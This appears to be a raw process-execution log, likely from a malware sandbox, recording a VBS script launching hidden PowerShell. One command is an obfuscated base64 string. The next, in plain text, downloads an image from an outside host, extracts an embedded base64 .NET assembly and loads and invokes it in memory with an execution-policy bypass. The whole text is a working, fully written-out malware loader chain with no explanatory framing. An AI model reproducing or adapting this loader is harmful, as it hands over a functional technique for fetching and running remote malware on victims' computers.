wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\cuzineeeeVBS_FILE.vbs
2548powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JçPOLHmoBpçPOLHmoG0çPOLHmoYQBnçPOLHmoGUçPOLHmoVQByçPOLHmoGwçPOLHmoIçPOLHmoçPOLHmo9çPOLHmoCçPOLHmoçPOLHmoJwBoçPOLHmoHQçPOLHmodçPOLHmoBwçPOLHmoHMçPOLHmoOgçPOLHmovçPOLHmoC8çPOLHmodQBwçPOLHmoGwçPOLHmobwBhçPOLHmoGQçPOLHmoZçPOLHmoBlçPOLHmoGkçPOLHmobQBhçPOLHmoGcçPOLHmoZQBuçPOLHmoHMçPOLHmoLgBjçPOLHmoG8çPOLHmobQçPOLHmouçPOLHmoGIçPOLHmocgçPOLHmovçPOLHmoGkçPOLHmobQBhçPOLHmoGcçPOLHmoZQBzçPOLHmoC8çPOLHmoMçPOLHmoçPOLHmowçPOLHmoDQçPOLHmoLwçPOLHmo2çPOLHmoDUçPOLHmoMgçPOLHmovçPOLHmoDUçPOLHmoMQçPOLHmo0çPOLHmoC8çPOLHmobwByçPOLHmoGkçPOLHmoZwBpçPOLHmoG4çPOLHmoYQBsçPOLHmoC8çPOLHmobgBlçPOLHmoHcçPOLHmoXwBpçPOLHmoG0çPOLHmoYQBnçPOLHmoGUçPOLHmoLgBqçPOLHmoHçPOLHmoçPOLHmoZwçPOLHmo/çPOLHmoDEçPOLHmoNgçPOLHmo5çPOLHmoDgçPOLHmoNwçPOLHmo2çPOLHmoDIçPOLHmoMQçPOLHmozçPOLHmoDQçPOLHmoJwçPOLHmo7çPOLHmoCQçPOLHmodwBlçPOLHmoGIçPOLHmoQwBsçPOLHmoGkçPOLHmoZQBuçPOLHmoHQçPOLHmoIçPOLHmoçPOLHmo9çPOLHmoCçPOLHmoçPOLHmoTgBlçPOLHmoHcçPOLHmoLQBPçPOLHmoGIçPOLHmoagBlçPOLHmoGMçPOLHmodçPOLHmoçPOLHmogçPOLHmoFMçPOLHmoeQBzçPOLHmoHQçPOLHmoZQBtçPOLHmoC4çPOLHmoTgBlçPOLHmoHQçPOLHmoLgBXçPOLHmoGUçPOLHmoYgBDçPOLHmoGwçPOLHmoaQBlçPOLHmoG4çPOLHmodçPOLHmoçPOLHmo7çPOLHmoCQçPOLHmoaQBtçPOLHmoGEçPOLHmoZwBlçPOLHmoEIçPOLHmoeQB0çPOLHmoGUçPOLHmocwçPOLHmogçPOLHmoD0çPOLHmoIçPOLHmoçPOLHmokçPOLHmoHcçPOLHmoZQBiçPOLHmoEMçPOLHmobçPOLHmoBpçPOLHmoGUçPOLHmobgB0çPOLHmoC4çPOLHmoRçPOLHmoBvçPOLHmoHcçPOLHmobgBsçPOLHmoG8çPOLHmoYQBkçPOLHmoEQçPOLHmoYQB0çPOLHmoGEçPOLHmoKçPOLHmoçPOLHmokçPOLHmoGkçPOLHmobQBhçPOLHmoGcçPOLHmoZQBVçPOLHmoHIçPOLHmobçPOLHmoçPOLHmopçPOLHmoDsçPOLHmoJçPOLHmoBpçPOLHmoG0çPOLHmoYQBnçPOLHmoGUçPOLHmoVçPOLHmoBlçPOLHmoHgçPOLHmodçPOLHmoçPOLHmogçPOLHmoD0çPOLHmoIçPOLHmoBbçPOLHmoFMçPOLHmoeQBzçPOLHmoHQçPOLHmoZQBtçPOLHmoC4çPOLHmoVçPOLHmoBlçPOLHmoHgçPOLHmodçPOLHmoçPOLHmouçPOLHmoEUçPOLHmobgBjçPOLHmoG8çPOLHmoZçPOLHmoBpçPOLHmoG4çPOLHmoZwBdçPOLHmoDoçPOLHmoOgBVçPOLHmoFQçPOLHmoRgçPOLHmo4çPOLHmoC4çPOLHmoRwBlçPOLHmoHQçPOLHmoUwB0çPOLHmoHIçPOLHmoaQBuçPOLHmoGcçPOLHmoKçPOLHmoçPOLHmokçPOLHmoGkçPOLHmobQBhçPOLHmoGcçPOLHmoZQBCçPOLHmoHkçPOLHmodçPOLHmoBlçPOLHmoHMçPOLHmoKQçPOLHmo7çPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEYçPOLHmobçPOLHmoBhçPOLHmoGcçPOLHmoIçPOLHmoçPOLHmo9çPOLHmoCçPOLHmoçPOLHmoJwçPOLHmo8çPOLHmoDwçPOLHmoQgBBçPOLHmoFMçPOLHmoRQçPOLHmo2çPOLHmoDQçPOLHmoXwBTçPOLHmoFQçPOLHmoQQBSçPOLHmoFQçPOLHmoPgçPOLHmo+çPOLHmoCcçPOLHmoOwçPOLHmokçPOLHmoGUçPOLHmobgBkçPOLHmoEYçPOLHmobçPOLHmoBhçPOLHmoGcçPOLHmoIçPOLHmoçPOLHmo9çPOLHmoCçPOLHmoçPOLHmoJwçPOLHmo8çPOLHmoDwçPOLHmoQgBBçPOLHmoFMçPOLHmoRQçPOLHmo2çPOLHmoDQçPOLHmoXwBFçPOLHmoE4çPOLHmoRçPOLHmoçPOLHmo+çPOLHmoD4çPOLHmoJwçPOLHmo7çPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEkçPOLHmobgBkçPOLHmoGUçPOLHmoeçPOLHmoçPOLHmogçPOLHmoD0çPOLHmoIçPOLHmoçPOLHmokçPOLHmoGkçPOLHmobQBhçPOLHmoGcçPOLHmoZQBUçPOLHmoGUçPOLHmoeçPOLHmoB0çPOLHmoC4çPOLHmoSQBuçPOLHmoGQçPOLHmoZQB4çPOLHmoE8çPOLHmoZgçPOLHmooçPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEYçPOLHmobçPOLHmoBhçPOLHmoGcçPOLHmoKQçPOLHmo7çPOLHmoCQçPOLHmoZQBuçPOLHmoGQçPOLHmoSQBuçPOLHmoGQçPOLHmoZQB4çPOLHmoCçPOLHmoçPOLHmoPQçPOLHmogçPOLHmoCQçPOLHmoaQBtçPOLHmoGEçPOLHmoZwBlçPOLHmoFQçPOLHmoZQB4çPOLHmoHQçPOLHmoLgBJçPOLHmoG4çPOLHmoZçPOLHmoBlçPOLHmoHgçPOLHmoTwBmçPOLHmoCgçPOLHmoJçPOLHmoBlçPOLHmoG4çPOLHmoZçPOLHmoBGçPOLHmoGwçPOLHmoYQBnçPOLHmoCkçPOLHmoOwçPOLHmokçPOLHmoHMçPOLHmodçPOLHmoBhçPOLHmoHIçPOLHmodçPOLHmoBJçPOLHmoG4çPOLHmoZçPOLHmoBlçPOLHmoHgçPOLHmoIçPOLHmoçPOLHmotçPOLHmoGcçPOLHmoZQçPOLHmogçPOLHmoDçPOLHmoçPOLHmoIçPOLHmoçPOLHmotçPOLHmoGEçPOLHmobgBkçPOLHmoCçPOLHmoçPOLHmoJçPOLHmoBlçPOLHmoG4çPOLHmoZçPOLHmoBJçPOLHmoG4çPOLHmoZçPOLHmoBlçPOLHmoHgçPOLHmoIçPOLHmoçPOLHmotçPOLHmoGcçPOLHmodçPOLHmoçPOLHmogçPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEkçPOLHmobgBkçPOLHmoGUçPOLHmoeçPOLHmoçPOLHmo7çPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEkçPOLHmobgBkçPOLHmoGUçPOLHmoeçPOLHmoçPOLHmogçPOLHmoCsçPOLHmoPQçPOLHmogçPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEYçPOLHmobçPOLHmoBhçPOLHmoGcçPOLHmoLgBMçPOLHmoGUçPOLHmobgBnçPOLHmoHQçPOLHmoaçPOLHmoçPOLHmo7çPOLHmoCQçPOLHmoYgBhçPOLHmoHMçPOLHmoZQçPOLHmo2çPOLHmoDQçPOLHmoTçPOLHmoBlçPOLHmoG4çPOLHmoZwB0çPOLHmoGgçPOLHmoIçPOLHmoçPOLHmo9çPOLHmoCçPOLHmoçPOLHmoJçPOLHmoBlçPOLHmoG4çPOLHmoZçPOLHmoBJçPOLHmoG4çPOLHmoZçPOLHmoBlçPOLHmoHgçPOLHmoIçPOLHmoçPOLHmotçPOLHmoCçPOLHmoçPOLHmoJçPOLHmoBzçPOLHmoHQçPOLHmoYQByçPOLHmoHQçPOLHmoSQBuçPOLHmoGQçPOLHmoZQB4çPOLHmoDsçPOLHmoJçPOLHmoBiçPOLHmoGEçPOLHmocwBlçPOLHmoDYçPOLHmoNçPOLHmoBDçPOLHmoG8çPOLHmobQBtçPOLHmoGEçPOLHmobgBkçPOLHmoCçPOLHmoçPOLHmoPQçPOLHmogçPOLHmoCQçPOLHmoaQBtçPOLHmoGEçPOLHmoZwBlçPOLHmoFQçPOLHmoZQB4çPOLHmoHQçPOLHmoLgBTçPOLHmoHUçPOLHmoYgBzçPOLHmoHQçPOLHmocgBpçPOLHmoG4çPOLHmoZwçPOLHmooçPOLHmoCQçPOLHmocwB0çPOLHmoGEçPOLHmocgB0çPOLHmoEkçPOLHmobgBkçPOLHmoGUçPOLHmoeçPOLHmoçPOLHmosçPOLHmoCçPOLHmoçPOLHmoJçPOLHmoBiçPOLHmoGEçPOLHmocwBlçPOLHmoDYçPOLHmoNçPOLHmoBMçPOLHmoGUçPOLHmobgBnçPOLHmoHQçPOLHmoaçPOLHmoçPOLHmopçPOLHmoDsçPOLHmoJçPOLHmoBjçPOLHmoG8çPOLHmobQBtçPOLHmoGEçPOLHmobgBkçPOLHmoEIçPOLHmoeQB0çPOLHmoGUçPOLHmocwçPOLHmogçPOLHmoD0çPOLHmoIçPOLHmoBbçPOLHmoFMçPOLHmoeQBzçPOLHmoHQçPOLHmoZQBtçPOLHmoC4çPOLHmoQwBvçPOLHmoG4çPOLHmodgBlçPOLHmoHIçPOLHmodçPOLHmoBdçPOLHmoDoçPOLHmoOgBGçPOLHmoHIçPOLHmobwBtçPOLHmoEIçPOLHmoYQBzçPOLHmoGUçPOLHmoNgçPOLHmo0çPOLHmoFMçPOLHmodçPOLHmoByçPOLHmoGkçPOLHmobgBnçPOLHmoCgçPOLHmoJçPOLHmoBiçPOLHmoGEçPOLHmocwBlçPOLHmoDYçPOLHmoNçPOLHmoBDçPOLHmoG8çPOLHmobQBtçPOLHmoGEçPOLHmobgBkçPOLHmoCkçPOLHmoOwçPOLHmokçPOLHmoGwçPOLHmobwBhçPOLHmoGQçPOLHmoZQBkçPOLHmoEEçPOLHmocwBzçPOLHmoGUçPOLHmobQBiçPOLHmoGwçPOLHmoeQçPOLHmogçPOLHmoD0çPOLHmoIçPOLHmoBbçPOLHmoFMçPOLHmoeQBzçPOLHmoHQçPOLHmoZQBtçPOLHmoC4çPOLHmoUgBlçPOLHmoGYçPOLHmobçPOLHmoBlçPOLHmoGMçPOLHmodçPOLHmoBpçPOLHmoG8çPOLHmobgçPOLHmouçPOLHmoEEçPOLHmocwBzçPOLHmoGUçPOLHmobQBiçPOLHmoGwçPOLHmoeQBdçPOLHmoDoçPOLHmoOgBMçPOLHmoG8çPOLHmoYQBkçPOLHmoCgçPOLHmoJçPOLHmoBjçPOLHmoG8çPOLHmobQBtçPOLHmoGEçPOLHmobgBkçPOLHmoEIçPOLHmoeQB0çPOLHmoGUçPOLHmocwçPOLHmopçPOLHmoDsçPOLHmoJçPOLHmoB0çPOLHmoHkçPOLHmocçPOLHmoBlçPOLHmoCçPOLHmoçPOLHmoPQçPOLHmogçPOLHmoCQçPOLHmobçPOLHmoBvçPOLHmoGEçPOLHmoZçPOLHmoBlçPOLHmoGQçPOLHmoQQBzçPOLHmoHMçPOLHmoZQBtçPOLHmoGIçPOLHmobçPOLHmoB5çPOLHmoC4çPOLHmoRwBlçPOLHmoHQçPOLHmoVçPOLHmoB5çPOLHmoHçPOLHmoçPOLHmoZQçPOLHmooçPOLHmoCcçPOLHmoRgBpçPOLHmoGIçPOLHmoZQByçPOLHmoC4çPOLHmoSçPOLHmoBvçPOLHmoG0çPOLHmoZQçPOLHmonçPOLHmoCkçPOLHmoOwçPOLHmokçPOLHmoG0çPOLHmoZQB0çPOLHmoGgçPOLHmobwBkçPOLHmoCçPOLHmoçPOLHmoPQçPOLHmogçPOLHmoCQçPOLHmodçPOLHmoB5çPOLHmoHçPOLHmoçPOLHmoZQçPOLHmouçPOLHmoEcçPOLHmoZQB0çPOLHmoE0çPOLHmoZQB0çPOLHmoGgçPOLHmobwBkçPOLHmoCgçPOLHmoJwBWçPOLHmoEEçPOLHmoSQçPOLHmonçPOLHmoCkçPOLHmoLgBJçPOLHmoG4çPOLHmodgBvçPOLHmoGsçPOLHmoZQçPOLHmooçPOLHmoCQçPOLHmobgB1çPOLHmoGwçPOLHmobçPOLHmoçPOLHmosçPOLHmoCçPOLHmoçPOLHmoWwBvçPOLHmoGIçPOLHmoagBlçPOLHmoGMçPOLHmodçPOLHmoBbçPOLHmoF0çPOLHmoXQçPOLHmogçPOLHmoCgçPOLHmoJwBkçPOLHmoEgçPOLHmoaçPOLHmoçPOLHmowçPOLHmoEwçPOLHmobQBwçPOLHmoHoçPOLHmoYQBIçPOLHmoFoçPOLHmobgBhçPOLHmoEcçPOLHmocçPOLHmoçPOLHmo0çPOLHmoFkçPOLHmoagBRçPOLHmoDIçPOLHmoWgBYçPOLHmoE4çPOLHmoaçPOLHmoBZçPOLHmoG0çPOLHmoVgB1çPOLHmoGEçPOLHmoWçPOLHmoBwçPOLHmoDEçPOLHmoWQB5çPOLHmoDgçPOLHmoMQBPçPOLHmoFQçPOLHmoRQB1çPOLHmoE4çPOLHmoRçPOLHmoBZçPOLHmoHUçPOLHmoTgBqçPOLHmoFUçPOLHmoeçPOLHmoBMçPOLHmoGoçPOLHmoUQçPOLHmo1çPOLHmoEwçPOLHmoeQçPOLHmo4çPOLHmoDYçPOLHmoYwBIçPOLHmoFIçPOLHmoMçPOLHmoBhçPOLHmoEEçPOLHmoPQçPOLHmo9çPOLHmoCcçPOLHmoIçPOLHmoçPOLHmosçPOLHmoCçPOLHmoçPOLHmoJwBkçPOLHmoGYçPOLHmoZçPOLHmoBmçPOLHmoGQçPOLHmoJwçPOLHmogçPOLHmoCwçPOLHmoIçPOLHmoçPOLHmonçPOLHmoGQçPOLHmoZgBkçPOLHmoGYçPOLHmoJwçPOLHmogçPOLHmoCwçPOLHmoIçPOLHmoçPOLHmonçPOLHmoGQçPOLHmoZgBkçPOLHmoGYçPOLHmoJwçPOLHmogçPOLHmoCwçPOLHmoIçPOLHmoçPOLHmonçPOLHmoGQçPOLHmoYQBkçPOLHmoHMçPOLHmoYQçPOLHmonçPOLHmoCçPOLHmoçPOLHmoLçPOLHmoçPOLHmogçPOLHmoCcçPOLHmoZçPOLHmoBlçPOLHmoCcçPOLHmoIçPOLHmoçPOLHmosçPOLHmoCçPOLHmoçPOLHmoJwBjçPOLHmoHUçPOLHmoJwçPOLHmopçPOLHmoCkçPOLHmo';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('çPOLHmo','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2700powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/652/514/original/new_image.jpg?1698762134';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy81OTEuNDYuNjUxLjQ5Ly86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2804